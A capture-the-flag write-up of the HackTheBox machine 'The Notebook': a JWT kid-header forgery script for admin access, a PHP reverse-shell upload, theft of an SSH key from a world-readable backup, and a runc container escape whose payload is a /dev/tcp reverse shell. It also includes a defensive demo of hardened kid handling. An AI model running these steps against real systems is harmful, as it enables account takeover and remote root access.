The Notebook | HackTheBox Writeup


The Notebook is a medium-difficulty Linux machine on HackTheBox by mostwanted002.

User Part

Starting with an nmap scan, I found three open ports (22, 80 and 5555) and one filtered port (10010):

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-06-21 00:37 EDT
Nmap scan report for
Host is up (0.18s latency).

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
5555/tcp open freeciv?
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
1 181.34 ms
2 181.72 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 28.02 seconds

Looking at HTTP, the site offers a login page and a registration page.

I registered with the username admin1 and logged in to the dashboard.

After login the app sets a JWT in a cookie. I decoded it with

The header carries a kid (key ID) claim, which tells the server which key to use when verifying the signature.

This article gave me the idea of exploiting the JWT kid header: if the server fetches the key from wherever kid points, I can make it fetch a key I control and sign tokens with it.

For exploitation, I generated an RSA key pair with ssh-keygen in PEM format, naming the key privKey.key:

└─# ssh-keygen -t rsa -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in
The key fingerprint is:
SHA256:1M/0JYqN2juJNBd8zEymR1rcKw4hjf0jLfaDLVeihAg root@kali
The key's randomart image is:
+---[RSA 3072]----+
| + . . |
| E o.+ * . |
| . ..+.#. ...|
| ... @B%ooo |
| Soo&==. |
| oo= * |
| ..+.+ . |
| . o. |
| .. |

I decoded the header and re-encoded it with kid set to a URL on my machine pointing at privKey.key.

I swapped the new base64 header into the token; the full JWT looks like this.

As you can see, only the kid value changed, and it now points at my machine.

Serving the key with Python's http.server and sending that token, I got a request from the target for the key file:

└─# python3 -m http.server 7070
Serving HTTP on port 7070 ( ... - - [21/Jun/2021 01:06:36] "GET /privKey.key HTTP/1.1" 200 -

Next I changed admin_cap in the payload from 0 to 1.

But nothing on the website changed. Editing the header and payload alone does not help: the signature was still the one the server made with its original key, so the token no longer verified against the key fetched from my kid URL. The token has to be re-signed with the private key I am serving.

So I looked at PyJWT, and this website gave me the idea to write a Python script that signs a forged token with my own key.

I wrote the script with the help of that website; it looks like this:

import jwt  # PyJWT, with the cryptography backend for RS256

# Private half of the key pair generated above with ssh-keygen -m PEM
PrivateKey = open("privKey.key", "r").read().strip()

# kid must point at privKey.key on my web server (the URL is elided on this page)
Headers = {"kid": ""}
Payload = {"username": "admin", "email": "admin@thmhtb", "admin_cap": 1}

Token = jwt.encode(Payload, PrivateKey, algorithm='RS256', headers=Headers)

# PyJWT 2.x returns str, PyJWT 1.x returns bytes
if isinstance(Token, bytes):
    Token = Token.decode()
print(Token)
Running the script printed the forged JWT:

└─# python3

I verified it using

Replacing the cookie with the forged JWT and refreshing the page gave me the admin dashboard; the server fetched my key again to verify it. Note that the kid points at the private key itself, so the server is verifying with whatever file it downloads, and the signature check becomes meaningless once that file is attacker-controlled.

└─# python3 -m http.server 7070
Serving HTTP on port 7070 ( ... - - [21/Jun/2021 02:27:54] "GET /privKey.key HTTP/1.1" 200 -
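To show why the first edit (changing kid and admin_cap but keeping the old signature) failed while the re-signed token worked, and what the fix on the server side looks like, here is an added stand-alone example that is not part of the writeup. The box used RS256 with an RSA key downloaded from the kid URL; this demo uses HS256 from the Python standard library so it runs without PyJWT or cryptography, and the key URLs, usernames and key bytes are constructed assumptions. The flaw is the same in both cases: the verifier lets the token decide where its own verification key comes from.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Added example, not code from the writeup. HS256 stands in for the box's RS256;
# the vulnerable pattern (key location taken from the untrusted kid header) is identical.


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_jwt(header: dict, payload: dict, key: bytes) -> str:
    signing_input = _encode_part(header) + "." + _encode_part(payload)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def split_jwt(token: str):
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), (h + "." + p).encode(), b64url_decode(s)


# Constructed stand-in for the HTTP fetches the server performs: URL -> key bytes.
# Both URLs are assumptions; the writeup elides the real kid value.
LEGIT_KID = "http://localhost:7070/privKey.key"      # where the app normally loads its key from
ATTACKER_KID = "http://10.10.14.5:7070/privKey.key"  # the attacker's python -m http.server
FAKE_HTTP = {
    LEGIT_KID: b"server-side-signing-key",
    ATTACKER_KID: b"attacker-controlled-key",
}

# Hardened design: kid is only a name in a server-side key store, never a location.
TRUSTED_KEYS = {"app-key-1": FAKE_HTTP[LEGIT_KID]}


def _check(key: Optional[bytes], signing_input: bytes, sig: bytes, payload: dict) -> Optional[dict]:
    if key is None:
        return None
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    return payload if hmac.compare_digest(expected, sig) else None


def verify_vulnerable(token: str) -> Optional[dict]:
    """Mirrors the box: the key is fetched from whatever URL the token's kid names."""
    header, payload, signing_input, sig = split_jwt(token)
    return _check(FAKE_HTTP.get(header.get("kid", "")), signing_input, sig, payload)


def verify_hardened(token: str, trusted_keys: dict) -> Optional[dict]:
    """kid only selects among keys the server already holds; unknown kids are rejected."""
    header, payload, signing_input, sig = split_jwt(token)
    return _check(trusted_keys.get(header.get("kid")), signing_input, sig, payload)


def issue_user_token() -> str:
    """What the app hands a freshly registered, non-admin user (values assumed)."""
    return sign_jwt({"alg": "HS256", "typ": "JWT", "kid": LEGIT_KID},
                    {"username": "admin1", "email": "admin1@example", "admin_cap": 0},
                    FAKE_HTTP[LEGIT_KID])


def tamper_without_resigning(token: str) -> str:
    """The writeup's first attempt: edit kid and admin_cap but keep the old signature."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    header["kid"] = ATTACKER_KID
    payload = json.loads(b64url_decode(p))
    payload["admin_cap"] = 1
    return _encode_part(header) + "." + _encode_part(payload) + "." + s


def forge_admin_token() -> str:
    """The working attack: sign with the attacker's key and point kid at that key."""
    return sign_jwt({"alg": "HS256", "typ": "JWT", "kid": ATTACKER_KID},
                    {"username": "admin", "email": "admin@thmhtb", "admin_cap": 1},
                    FAKE_HTTP[ATTACKER_KID])


if __name__ == "__main__":
    print("tampered, not re-signed:", verify_vulnerable(tamper_without_resigning(issue_user_token())))
    print("forged and re-signed   :", verify_vulnerable(forge_admin_token()))
    print("forged vs hardened     :", verify_hardened(forge_admin_token(), TRUSTED_KEYS))
```

The tampered token is rejected even by the vulnerable verifier, because the old signature no longer matches either the changed signing input or the attacker's key; the re-signed token passes because the server downloads the very key it was signed with. The hardened verifier treats kid as a lookup name in a fixed key table and never fetches anything, so the attacker's kid simply has no entry.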

Clicking on the admin panel shows that I can upload files.

I uploaded a PHP reverse shell and caught the callback as www-data.

Enumerating the box, I found backup files in /var/backups. Alongside the usual package backups there is a home.tar.gz readable by everyone, which is suspicious, so I downloaded it to my machine and inspected it:

www-data@thenotebook:/var/backups$ ls -la
ls -la
total 696
drwxr-xr-x 2 root root 4096 Jun 21 06:26 .
drwxr-xr-x 14 root root 4096 Feb 12 06:52 ..
-rw-r--r-- 1 root root 51200 Jun 21 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 33252 Feb 24 08:53 apt.extended_states.0
-rw-r--r-- 1 root root 3609 Feb 23 08:58 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3621 Feb 12 06:52 apt.extended_states.2.gz
-rw-r--r-- 1 root root 437 Feb 12 06:17 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Feb 12 06:52 dpkg.statoverride.0
-rw-r--r-- 1 root root 571460 Feb 24 08:53 dpkg.status.0
-rw------- 1 root root 693 Feb 17 13:18 group.bak
-rw------- 1 root shadow 575 Feb 17 13:18 gshadow.bak
-rw-r--r-- 1 root root 4373 Feb 17 09:02 home.tar.gz
-rw------- 1 root root 1555 Feb 12 06:24 passwd.bak
-rw------- 1 root shadow 1024 Feb 12 07:33 shadow.bak
└─# wget
--2021-06-21 02:41:03--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 4373 (4.3K) [application/gzip]
Saving to: ‘home.tar.gz’

home.tar.gz 100%[============================================>] 4.27K --.-KB/s in 0s

2021-06-21 02:41:03 (80.7 MB/s) - ‘home.tar.gz’ saved [4373/4373]


Extracting it gave me an id_rsa from noah's home directory:

└─# tar -xvf home.tar.gz

That key gave me a user shell as noah:

└─# chmod 600 home/noah/.ssh/id_rsa

└─# ssh -i home/noah/.ssh/id_rsa noah@
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

* Documentation:
* Management:
* Support:

System information as of Mon Jun 21 06:43:59 UTC 2021

System load: 0.11 Processes: 205
Usage of /: 40.2% of 7.81GB Users logged in: 1
Memory usage: 19% IP address for ens160:
Swap usage: 0% IP address for docker0:

* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:

61 packages can be updated.
0 updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

Last login: Mon Jun 21 06:22:03 2021 from

Root Part

I checked which commands the current user can run as root with sudo -l.

noah can run docker exec against the webapp-dev01 container without a password. The trailing wildcard in the rule matches anything after the container name, so any command can be run inside that container as its root user:

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass,

User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

I checked the Docker version and it is old (18.06.0-ce). The client cannot reach the daemon socket as noah, so the sudo rule is the only way to interact with containers:

noah@thenotebook:~$ docker version
Version: 18.06.0-ce
API version: 1.38
Go version: go1.10.3
Git commit: 0ffa825
Built: Wed Jul 18 19:09:54 2018
OS/Arch: linux/amd64
Experimental: false
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.38/version: dial unix /var/run/docker.sock: connect: permission denied

I searched for an exploit for this Docker version and found a CVE.

Then I searched for a PoC on GitHub.

The PoC, written in Go, works by overwriting /bin/sh inside the container so that the next docker exec of /bin/sh from the host runs the attacker's payload on the host as root. I changed the payload line below to a reverse shell back to my machine, built it, and uploaded the binary into the container:


// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/ 0>&1"

noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 bash
root@90ce2b0668d0:/opt/webapp# cd /tmp/
root@90ce2b0668d0:/tmp# wget
--2021-06-21 07:33:46--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 2236814 (2.1M) [application/octet-stream]
Saving to: ‘main.1’

main.1 100%[============================================>] 2.13M 1023KB/s in 2.1s

2021-06-21 07:33:48 (1023 KB/s) - ‘main.1’ saved [2236814/2236814]


I ran it inside the container; it waits for a new process. From a second session on the host I triggered it with sudo docker exec on /bin/sh. The docker CLI printed an error, but the payload fired on the host:

root@90ce2b0668d0:/tmp# ./main 
[+] Overwritten /bin/sh successfully
[+] Found the PID: 57
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc0000aa180}
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
No help topic for '/bin/sh'

My listener received a root shell on the host:

└─# nc -lvnp 4200
Listening on 4200
Connection received on 41878
bash: cannot set terminal process group (5722): Inappropriate ioctl for device
bash: no job control in this shell
<47f46e91675653d57a915006bf61ab13a6790e75f2c511ee9# cat /root/root.txt
cat /root/root.txt